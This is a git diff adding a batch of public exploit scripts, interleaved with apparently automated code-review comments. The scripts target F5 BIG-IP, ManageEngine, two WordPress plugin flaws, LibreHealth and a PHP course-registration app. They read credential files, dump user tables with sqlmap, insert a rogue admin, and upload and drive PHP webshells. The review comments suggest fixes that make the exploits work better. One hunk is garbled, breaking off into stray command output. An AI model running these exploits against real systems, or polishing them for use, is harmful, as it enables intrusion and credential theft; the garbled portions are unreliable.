diff --git a/exploits/hardware/webapps/48694.txt b/exploits/hardware/webapps/48694.txt new file mode 100644 index 000000000..268a0eb4e --- /dev/null +++ b/exploits/hardware/webapps/48694.txt @@ -0,0 +1,62 @@ +# Title: UBICOD Medivision Digital Signage 1.5.1 - Cross-Site Request Forgery (Add Admin) +# Date: 2020-07-23 +# Author: LiquidWorm +# Product web page: http://www.medivision.co.kr +# CVE: N/A + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/hardware/webapps/48711.py b/exploits/hardware/webapps/48711.py new file mode 100755 index 000000000..3a34138b1 --- /dev/null +++ b/exploits/hardware/webapps/48711.py 
@@ -0,0 +1,128 @@ +# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion +# Date: 2019-08-17 +# Exploit Author: Carlos E. Vieira +# Vendor Homepage: https://www.f5.com/products/big-ip-services +# Version: <= 13.1.3 +# Tested on: BIG-IP 13.1.3 Build 0.0.6 +# CVE : CVE-2020-5902 + +#!/usr/bin/env python + +import requests +import sys +import time +import urllib3 +import json +urllib3.disable_warnings() + +global target + +def checkTarget(): + + r = requests.head(target + "/tmui/login.jsp", verify=False) + if(r.status_code == 200): + return True + else: + return False + +def checkVuln(): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0): + return True + else: + return False + + else: + return False + +def leakPasswd(): + print("[+] Leaking /etc/passwd from server") + time.sleep(2) + exploit('/etc/passwd') + + +def leakHosts(): + print("[+] Leaking /etc/hosts from server") + time.sleep(2) + exploit('/etc/hosts') + +def leakLicence(): + + print("[+] Leaking /config/bigip.license from server") + time.sleep(2) + exploit('/config/bigip.license') + +def leakAdmin(): + + print("[+] Leaking admin credentials from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin", verify=False) + if(r.status_code == 200): + + data = json.loads(r.text) + if(len(data['output']) > 0 ): + print(data['output']) + else: + print("[X] Admin credentials not found") + else: + print("[X] Fail to read file") + + +def exploit(file): + + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=" + file, verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + print(data['output']) + else: + print("[X] Fail to read file") + +def memoryLeak(): + print("[!] 
Leaking tomcat process from server") + time.sleep(2) + r = requests.get(target + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline", verify=False) + if(r.status_code == 200): + data = json.loads(r.text) + if(len(data['output'])>0): + print("Command: " + data['output']) + +def main(host): + + print("[+] Check target...") + global target + target = "https://" + host + + check = checkTarget() + if(check): + print("[~] Target is available") + + vuln = checkVuln() + if(vuln): + print("[+] Target is vulnerable!") + + time.sleep(1) + print("[~] Leak information from target!") + time.sleep(1) + leakPasswd() + leakHosts() + leakLicence() + leakAdmin() + memoryLeak() + else: + print("[X] Target is't vulnerable") + + else: + print("[x] Target is unavailable") + + +if __name__ == "__main__": + + if(len(sys.argv) < 2): + print("Use: python {} ip/dns".format(sys.argv[0])) + else: + host = sys.argv[1] + main(host) \ No newline at end of file diff --git a/exploits/java/webapps/48692.py b/exploits/java/webapps/48692.py new file mode 100755 index 000000000..500ec8575 --- /dev/null +++ b/exploits/java/webapps/48692.py 
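Review bot: The `#!/usr/bin/env python` line is placed after the header comment block (around line 10 of the new file), so it is an ordinary comment rather than a shebang and the script cannot be executed directly; either move it to line 1 or drop it. The module-level `global target` is a no-op — only the `global target` inside `main` has any effect — and can be removed. `checkVuln`, `leakAdmin`, `exploit` and `memoryLeak` pass `r.text` straight to `json.loads` and then index `data['output']` with no handling of `ValueError`/`KeyError`, so a 200 response that is not the expected JSON makes the script die with a traceback instead of reporting a result. The message `"[X] Target is't vulnerable"` should read `"[X] Target isn't vulnerable"`.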
@@ -0,0 +1,95 @@ +# Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection +# Google Dork: intitle:"Applications Manager Login Screen" +# Date: 2020-07-23 +# Exploit Author: aldorm +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: +# Version: 12 and 13 before Build 13200 +# Tested on: Windows +# CVE : 2016-9488 + +#!/usr/bin/env python2 + +# App: ManageEngine Applications Manager +# Versions: 12 and 13 before build 13200 +# CVE: CVE-2016-9488 +# Vuln Type: SQL Injection +# CVSSv3: 9.8 +# +# PoC Autor: aldorm +# Release date: 23-07-2020 + +# ./poc_CVE-2016-9488.py 192.168.123.113 8443 --create-user-hacker +# [*] Extracting all users: +# admin:21232f297a57a5a743894a0e4a801fc3 +# reportadmin:21232f297a57a5a743894a0e4a801fc3 +# systemadmin_enterprise:21232f297a57a5a743894a0e4a801fc3 +# [*] Creating new user: +# User: hacker +# Password: admin +# [*] Verifing created user... +# Success. + + +import sys +import requests +import urllib3 +import json + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +target = 'localhost' + +def get_userpassword(): + sqli = ' UNION ALL SELECT userid,CONCAT(username,$$:$$,password),NULL FROM am_userpasswordtable--' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + j = json.loads(r.text) + return j + +def create_user(): + sqli = '; INSERT INTO am_userpasswordtable VALUES (123123123, $$hacker$$,$$21232f297a57a5a743894a0e4a801fc3$$,NULL,NULL,$$21232f297a57a5a743894a0e4a801fc3$$,1); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$USERS$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, 
verify=False); + + sqli = ';INSERT INTO amdb.public.am_usergrouptable VALUES ($$hacker$$,$$ADMIN$$); -- ' + r= requests.get('https://%s:%s/servlet/MenuHandlerServlet' % (target,port ), params= 'action=verticalmenulist&config_id=0 %s' % sqli, verify=False); + + return + + +def main (): + if not len(sys.argv) > 2: + print "Usage %swww-data \ No newline at end of file +uid=33(www-data) gid=33(www-data) groups=33(www-data) \ No newline at end of file diff --git a/exploits/php/webapps/48690.txt b/exploits/php/webapps/48690.txt new file mode 100644 index 000000000..03e214462 --- /dev/null +++ b/exploits/php/webapps/48690.txt @@ -0,0 +1,16 @@ +# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) +# Author: Balzabu +# Discovery Date: 2020-07-23 +# Vendor Homepage: https://goautodial.org/ +# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html +# Tested Version: 4.0 (Last relase as of today) +# Tested on OS: CentOS 7 + +# STEPS TO REPRODUCE: + +# 1 - Log in as an agent +# 2 - Write a new message to user goadmin with: +Subject: Help me, I can't connect to the webphone +Text: whatever you want +# 3 - Send and wait for goadmin to read the message... :-) \ No newline at end of file diff --git a/exploits/php/webapps/48698.txt b/exploits/php/webapps/48698.txt new file mode 100644 index 000000000..45f9a3207 --- /dev/null +++ b/exploits/php/webapps/48698.txt 
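Review bot: The hunk as rendered is truncated: `main()` breaks off at `print "Usage %s` and what follows (`www-data`, `uid=33(www-data) gid=33(www-data) ...`) is output text that does not belong to this file, so the argument handling, the assignment of `port` (used by `get_userpassword` and `create_user`) and the `--create-user-hacker` flow described in the header cannot be reviewed here. In the visible part, `create_user` assigns `r` three times without ever reading it, and the `requests.get(...)` statements end in stray `;` — both are style points. The header line `# CVE : 2016-9488` should carry the `CVE-` prefix, as the comment block below it already does.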
@@ -0,0 +1,40 @@ +# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download +# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt +# Date: 2020-07-20 +# Exploit Author: KBA@SOGETI_ESEC +# Vendor Homepage: https://www.icegram.com/email-subscribers/ +# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2 +# Version: <= 4.2.2 +# Tested on: Email Subscribers & Newsletters 4.2.2 +# CVE : CVE-2019-19985 + + ################################################################################################ + # ___ ___ ___ ___ ___ # + # /\ \ /\ \ /\ \ /\ \ /\ \ ___ # + # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ # + # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ # + # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ # + # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ # + # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / # + # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ # + # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ # + # \::/ / \::/ / \::/ / \:\__\ \/__/ # + # \/__/ \/__/ \/__/ \/__/ # + # ___ ___ ___ ___ # + # /\ \ /\ \ /\ \ /\ \ # + # /::\ \ /::\ \ /::\ \ /::\ \ # + # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ # + # Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ # + # Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ # + # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ # + # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ # + # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ # + # \:\__\ \::/ / \:\__\ \:\__\ # + # KBAZ \/__/ \/__/ \/__/ \/__/ # + # # + # # + ################################################################################################ + + +curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all' +EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all' \ No newline at end of file 
diff --git a/exploits/php/webapps/48699.sh b/exploits/php/webapps/48699.sh new file mode 100755 index 000000000..d85cd4f75 --- /dev/null +++ b/exploits/php/webapps/48699.sh 
@@ -0,0 +1,127 @@ +# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - 'hash' SQL Injection (Unauthenticated) +# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt +# Date: 2020-07-20 +# Exploit Author: KBAZ@SOGETI_ESEC +# Vendor Homepage: https://www.icegram.com/email-subscribers/ +# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2 +# Version: < 4.3.3 +# Tested on: Email Subscribers & Newsletters 4.2.2 +# CVE : CVE-2019-20361 +# Reference : https://vuldb.com/?id.148399, https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361 + +main () { + header + if [ "$#" -ne 1 ]; then + echo "Usage : bash CVE-2019-20361.sh [BASE URL]" + echo "Example : bash CVE-2019-20361.sh http://127.0.0.1/" + exit + fi + + url=$1 + echo ' Target URL : ' "$url" + echo ' Generating sqlmap tamper script in /tmp' + gen_sqlmap_tamper + sqlmap_cmd="sqlmap -u ${url}?es=open&hash=* --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3" + echo ' SQLMap base command : ' "$sqlmap_cmd" + + while true + do + sleep 1 + echo '' + echo " Possible choices: " + echo '' + echo " 0) Exit" + echo " 1) Simple vulnerability test SLEEP(5)" + echo " 2) Vulnerability test with SQLMap " + echo " 3) Get WP users data" + echo " 4) Get subscribers information" + echo " 5) Get 'Simple WP SMTP' settings" + echo '' + echo -n ' Choice number => ' + read n + + case $n in + 0) exit ;; + 1) echo 'Testing SLEEP(5)...' 
+ { time (curl -i -s -k ${url}'?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo -e "\033[0;31m" ' [+] Vulnerable' "\033[0m" || echo ' [-] Not vulnerable' ;; + 2) $sqlmap_cmd ;; + 3) $sqlmap_cmd -T wp_users,wp_usermeta --dump ;; + 4) $sqlmap_cmd -T wp_ig_contacts --dump ;; + 5) $sqlmap_cmd --sql-query 'select * from wp_options where option_name="swpsmtp_options"' ;; + *) echo "Invalid option" ;; + esac + done + +} + +header () { + +echo '' +echo ' ################################################################################################'; +echo ' # ___ ___ ___ ___ ___ #'; +echo ' # /\ \ /\ \ /\ \ /\ \ /\ \ ___ #'; +echo ' # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ #'; +echo ' # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ #'; +echo ' # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ #'; +echo ' # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ #'; +echo ' # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / #'; +echo ' # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ #'; +echo ' # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ #'; +echo ' # \::/ / \::/ / \::/ / \:\__\ \/__/ #'; +echo ' # \/__/ \/__/ \/__/ \/__/ #'; +echo ' # ___ ___ ___ ___ #'; +echo ' # /\ \ /\ \ /\ \ /\ \ #'; +echo ' # /::\ \ /::\ \ /::\ \ /::\ \ #'; +echo ' # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ #'; +echo ' # Email Subscribers & Newsletters < 4.3.1 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ #'; +echo ' # Unauthenticated Blind SQL Injection /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #'; +echo ' # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ #'; +echo ' # \:\ 
\:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ #'; +echo ' # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ #'; +echo ' # \:\__\ \::/ / \:\__\ \:\__\ #'; +echo ' # KBAZ \/__/ \/__/ \/__/ \/__/ #'; +echo ' # #'; +echo ' # #'; +echo ' ################################################################################################'; +echo '' +} + +raw_commands () { + + echo '{"message_id":"100","campaign_id":"100","contact_id":"' "100','100','100','3'),('1594999398','1594999398','1',(SELECT SLEEP(5)),'100','100','3'),('1594999398','1594999398','1','100" '","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' | base64 -w 0 + + { time (curl -i -s -k 'http://127.0.0.1/?es=open&hash=eyJtZXNzYWdlX2lkIjoiMTAwIiwiY2FtcGFpZ25faWQiOiIxMDAiLCJjb250YWN0X2lkIjoiIDEwMCcsJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsKFNFTEVDVCBTTEVFUCg1KSksJzEwMCcsJzEwMCcsJzMnKSwoJzE1OTQ5OTkzOTgnLCcxNTk0OTk5Mzk4JywnMScsJzEwMCAiLCJlbWFpbCI6ImtiYXpAc29nZXRpZXNlYy5jb20iLCJndWlkIjoia2JhemlzLWRhYmVzdC1rYmF6aXMtZGFiZXN0LWJhcHJvdSIsImFjdGlvbiI6Im9wZW4ifQo' > /dev/null) } |& grep -q '0m5,' && echo '[+] Vulnerable' || echo '[-] Not vulnerable' + + sqlmap -u 'http://127.0.0.1/?es=open&hash=*' --tamper /tmp/tamper_CVE-2019-1356989.py --technique T --dbms mysql --level 5 --risk 3 + + -T wp_users,wp_usermeta --dump + -T wp_ig_contacts --dump + --sql-query 'select * from wp_options where option_name="swpsmtp_options"' + +} + +gen_sqlmap_tamper () { + + touch /tmp/__init__.py + + cat << _END > /tmp/tamper_CVE-2019-1356989.py +#!/usr/bin/env python + +import base64 +import urllib + +def tamper(payload, **kwargs): + +#{"message_id":"100","campaign_id":"100","contact_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"} +#INSERT INTO wp_ig_actions (created_at, updated_at, count, contact_id, message_id, campaign_id, type) VALUES ('1595001866','1595001866','1','100','100','100','3') ON DUPLICATE KEY UPDATE created_at = created_at, count = 
count+1, updated_at = '1595001866' + + param = '{"contact_id":"' + param += "100','100','100','3'),('1594999398','1594999398','1',(1%s),'100','100','3'),('1594999398','1594999398','1','100" + param += '","campaign_id":"100","message_id":"100","email":"kbaz@sogetiesec.com","guid":"kbazis-dabest-kbazis-dabest-baprou","action":"open"}' + + #print(param%payload) + return base64.encodestring( (param%payload).encode('utf-8') ).decode('utf-8').replace('\n', '') +_END +} + +main $@ \ No newline at end of file diff --git a/exploits/php/webapps/48702.txt b/exploits/php/webapps/48702.txt new file mode 100644 index 000000000..b7e58d0dc --- /dev/null +++ b/exploits/php/webapps/48702.txt 
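Review bot: The final `main $@` and the `$sqlmap_cmd` expansions in the `case` arms are unquoted, so an argument containing spaces is split and the `?`/`*` in the URL are subject to pathname expansion; use `main "$@"` and keep the sqlmap invocation in a bash array (`sqlmap_cmd=(sqlmap -u "${url}?es=open&hash=*" --tamper ...)`, run as `"${sqlmap_cmd[@]}"`). `gen_sqlmap_tamper` writes to the fixed, predictable paths `/tmp/__init__.py` and `/tmp/tamper_CVE-2019-1356989.py` in a world-writable directory, so a pre-existing file or symlink planted by another local user is overwritten or followed; `mktemp -d` would avoid that. `raw_commands` is never called and its last three lines are bare option fragments rather than commands, so it would fail if invoked — it reads as author notes and belongs in a comment block.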
@@ -0,0 +1,130 @@ +# Exploit Title: LibreHealth 2.0.0 - Authenticated Remote Code Execution +# Exploit Author: Bobby Cooke +# Date: 2020-07-17 +# Vendor Homepage: https://librehealth.io/ +# Software Link: https://github.com/LibreHealthIO/lh-ehr +# Version: 2.0.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 +# Exploit Tested Using: Python 2.7.17 +# Vulnerability Description: +# LibreHealth v2.0.0 suffers from an authenticated file upload vulnerability allowing +# remote attackers to gain remote code execution (RCE) on the hosting webserver +# via uploading a maliciously crafted image. + +import requests, sys, re +from colorama import Fore, Back, Style + +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) +proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} +F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] +B = [Back.RESET,Back.BLACK,Back.RED,Back.GREEN,Back.YELLOW,Back.BLUE,Back.MAGENTA,Back.CYAN,Back.WHITE] +S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] +info = S[3]+F[5]+'['+S[0]+S[3]+'-'+S[3]+F[5]+']'+S[0]+' ' +err = S[3]+F[2]+'['+S[0]+S[3]+'!'+S[3]+F[2]+']'+S[0]+' ' +ok = S[3]+F[3]+'['+S[0]+S[3]+'+'+S[3]+F[3]+']'+S[0]+' ' + +def webshell(SERVER_URL, WEBSHELL_FILE, session): + try: + WEB_SHELL = SERVER_URL+'sites/default/profile_pictures/'+WEBSHELL_FILE + print(info+"Webshell URL: "+ WEB_SHELL) + getdir = {'telepathy': 'echo %CD%'} + r2 = session.post(url=WEB_SHELL, data=getdir, verify=False) + status = r2.status_code + if status != 200: + print(err+"Could not connect to the webshell.") + r2.raise_for_status() + print(ok+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + print(S[1]+F[2]+')'+F[4]+'+++++'+F[2]+'['+F[0]+'=========>'+S[0]+S[3]+' WELCOME BOKU 
'+S[0]+S[1]+'<========'+F[2]+']'+F[4]+'+++++'+F[2]+'('+F[0]+S[0]) + while True: + thought = raw_input(term) + command = {'telepathy': thought} + r2 = requests.post(WEB_SHELL, data=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print('\r\n'+err+'Webshell session failed. Quitting.') + quit() + +def sig(): + SIG = S[3]+F[4]+".-----.._ ,--.\n" + SIG += F[4]+"| .. > ___ | | .--.\n" + SIG += F[4]+"| |.' ,'-\" \"-. |/ /__ __\n" + SIG += F[4]+"| < "+F[2]+" * *"+F[4]+" \ / \\/ \\\n" + SIG += F[4]+"| |> )"+F[2]+" * * *"+F[4]+" / \\ \\\n" + SIG += F[4]+"|____..- '-."+F[2]+"*"+F[4]+"_"+F[2]+"*"+F[4]+".-'_|\\___|._..\\___\\\n" + SIG += F[4]+" _______"+F[2]+"github.com/boku7"+F[4]+"_____\n"+S[0] + return SIG + +def formatHelp(STRING): + return S[3]+F[2]+STRING+S[0] + +def header(): + head = S[3]+F[2]+'LibreHealth v2.0.0 - Authenticated Remote Code Execution (RCE)'+S[0] + return head + +if __name__ == "__main__": + print(header()) + print(sig()) +#0 | Help + if len(sys.argv) != 4: + print formatHelp("(+) Usage:\t python %s" % sys.argv[0]) + print formatHelp("(+) Example:\t python %s 'http://172.16.65.130/LibreEHR/' 'admin' 'admin'" % sys.argv[0]) + sys.exit(-1) +#1 | INIT + USERNAME = "admin" + PASSWORD = "admin" + SERVER_URL = 'http://172.16.65.130/LibreEHR/' + if not re.match(r".*/$", SERVER_URL): + SERVER_URL = SERVER_URL+'/' + LOGIN_URL = SERVER_URL+'interface/login/login.php' + LOGIN_POST = SERVER_URL+'interface/main/main_screen.php?auth=login&site=default' + UPLOAD_URL = SERVER_URL+'interface/new/new_comprehensive_save.php' +#2 | Create Session + s = requests.Session() + get_session = s.get(LOGIN_URL, verify=False) + if get_session.status_code == 200: + print(ok+'Successfully connected to LibreHealth server & created session.') + print(info+"Session Cookie: "+get_session.headers['Set-Cookie']) + else: + print(err+'Cannot connect to the server and create a web session.') + 
login_data = {'new_login_session_management':'1', 'authProvider':'Default','authUser':USERNAME,'clearPass':PASSWORD,'languageChoice':'1'} + print(info+"Attempting to Login to LibreHealth with credentials: "+USERNAME+":"+PASSWORD) + auth = s.post(url=LOGIN_POST, data=login_data, verify=False, proxies=proxies) + loginchk = str(re.findall(r'Calendar', auth.text)) + if loginchk == "[u'Calendar', u'Calendar']": + print(ok+"Login successful.") + else: + print(err+"Failed login. Check credentials.") +#3 | File Upload + PNG_magicBytes = '\x89\x50\x4e\x47\x0d\x0a\x1a' + png = { + 'profile_picture': + ( + 'kaio-ken.php', + PNG_magicBytes+'\n'+'', + 'image/png', + {'Content-Disposition': 'form-data'} + ) + } + fdata = {'form_cb_1':'upload','form_fname':'Sun','form_mname':'','form_lname':'Wukong','form_sex':'Male','form_status':'','form_facility':''} + print(info+"Exploiting avatar file upload vulnerability to upload a PHP webshell") + upload_avatar = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False) +#4 | Get Webshell Upload Name + uploadchk = str(re.findall(r'demographics\.php\?set_pid=', upload_avatar.text)) + if uploadchk == "[u'demographics.php?set_pid=']": + print(ok+"Successfully uploaded webshell") + else: + print(err+"Webshell upload failed.") + avatarFile = str(re.findall(r'demographics\.php\?set_pid=\d*\&', upload_avatar.text)) + avatarFile = re.sub('^.*demographics\.php\?set_pid=', '', avatarFile) + avatarFile = re.sub('&.*$', '', avatarFile) + avatarFile = avatarFile+'.php' + print(info+"Webshell Filename: "+avatarFile) +#5 | interact with webshell for Remote Command Execution + webshell(SERVER_URL, avatarFile, s) \ No newline at end of file diff --git a/exploits/php/webapps/48704.py b/exploits/php/webapps/48704.py new file mode 100755 index 000000000..4222f3494 --- /dev/null +++ b/exploits/php/webapps/48704.py 
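Review bot: The `#1 | INIT` section hard-codes `USERNAME = "admin"`, `PASSWORD = "admin"` and `SERVER_URL = 'http://172.16.65.130/LibreEHR/'` immediately after the `len(sys.argv) != 4` check, so the three command-line arguments the usage text asks for are never read; presumably `SERVER_URL, USERNAME, PASSWORD = sys.argv[1:4]` was intended. The login POST passes `proxies=proxies` (127.0.0.1:8080) while no other request does, which looks like a leftover debugging proxy and makes the login fail unless something is listening there. The file mixes the Python 2 `print formatHelp(...)` statement with `print(...)` calls, and `webshell` uses a bare `except:` that also swallows KeyboardInterrupt — `except Exception:` would keep Ctrl-C working. The file is Python but is added as `48702.txt`, so it is not runnable as committed.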
@@ -0,0 +1,113 @@ +# Exploit Title: Online Course Registration 1.0 - Unauthenticated Remote Code Execution +# Exploit Author: Bobby Cooke +# Credit to BKpatron for similar Auth Bypass on admin page - exploit-db.com/exploits/48559 +# Date: 2020-07-15 +# Vendor Homepage: Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 | Python 2.7.18 + +import requests, sys, urllib, re +from colorama import Fore, Back, Style +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) +ok = Fore.GREEN+'['+Fore.RESET+'+'+Fore.GREEN+']'+Fore.RESET+' ' +err = Fore.RED+'['+Fore.RESET+'!'+Fore.RED+']'+Fore.RESET+' ' +info = Fore.BLUE+'['+Fore.RESET+'-'+Fore.BLUE+']'+Fore.RESET+' ' +RS = Style.RESET_ALL +FR = Fore.RESET +YL = Fore.YELLOW +RD = Fore.RED + +def webshell(SERVER_URL, session): + try: + WEB_SHELL = SERVER_URL+'studentphoto/kaio-ken.php' + getdir = {'telepathy': 'echo %CD%'} + r2 = session.post(url=WEB_SHELL, data=getdir, verify=False) + status = r2.status_code + if status != 200: + print(err+"Could not connect to the webshell.") + r2.raise_for_status() + print(ok+'Successfully connected to webshell.') + cwd = re.findall('[CDEF].*', r2.text) + cwd = cwd[0]+"> " + term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET + print(RD+')'+YL+'+++++'+RD+'['+FR+'=========>'+' WELCOME BOKU '+'<========'+RD+']'+YL+'+++++'+RD+'('+FR) + while True: + thought = raw_input(term) + command = {'telepathy': thought} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + status = r2.status_code + if status != 200: + r2.raise_for_status() + response2 = r2.text + print(response2) + except: + print('\r\n'+err+'Webshell session failed. 
Quitting.') + quit() + +def formatHelp(STRING): + return Style.BRIGHT+Fore.RED+STRING+Fore.RESET + +def header(): + SIG = RD+' /\\\n'+RS + SIG += YL+'/vvvvvvvvvvvv '+RD+'\\'+FR+'--------------------------------------,\n' + SIG += YL+'`^^^^^^^^^^^^'+RD+' /'+FR+'============'+RD+'BOKU'+FR+'====================="\n' + SIG += RD+' \/'+RS+'\n' + return SIG + +if __name__ == "__main__": + print(header()) + if len(sys.argv) != 2: + print(formatHelp("(+) Usage:\t python %s " % sys.argv[0])) + print(formatHelp("(+) Example:\t python %s 'https://10.0.0.3:443/Online Course Registration/'" % sys.argv[0])) + quit() + SERVER_URL = sys.argv[1] + if not re.match(r".*/$", SERVER_URL): + SERVER_URL = SERVER_URL+'/' + LOGIN_URL = SERVER_URL+'index.php' + PROFILE_URL = SERVER_URL+'my-profile.php' + print(info+'Creating session and saving PHPSESSID') + s = requests.Session() + get_session = s.get(SERVER_URL, verify=False) + if get_session.status_code == 200: + print(ok+'Successfully connected to server and created session.') + print(info+get_session.headers['Set-Cookie']) + else: + print(err+'Cannot connect to the server and create a web session.') + bypass_data = {'regno' : '\' or 1=1; -- boku', 'password' : '\' or 1=1; -- boku', 'submit' : ''} + print(info+'Bypassing authentication of student login portal.') + auth_bypass = s.post(url=LOGIN_URL, data=bypass_data, verify=False) + if auth_bypass.history: + for resp in auth_bypass.history: + print(info+'Response Status-Code: ' + str(resp.status_code)) + print(info+'Location: ' + str(resp.headers['location'])) + redirectURL = resp.headers['location'] + if re.match(r".*change-password.php", redirectURL): + print(ok+'Successfully bypassed user portal authentication.') + else: + print(err+'Failed to bypass user portal authentication. 
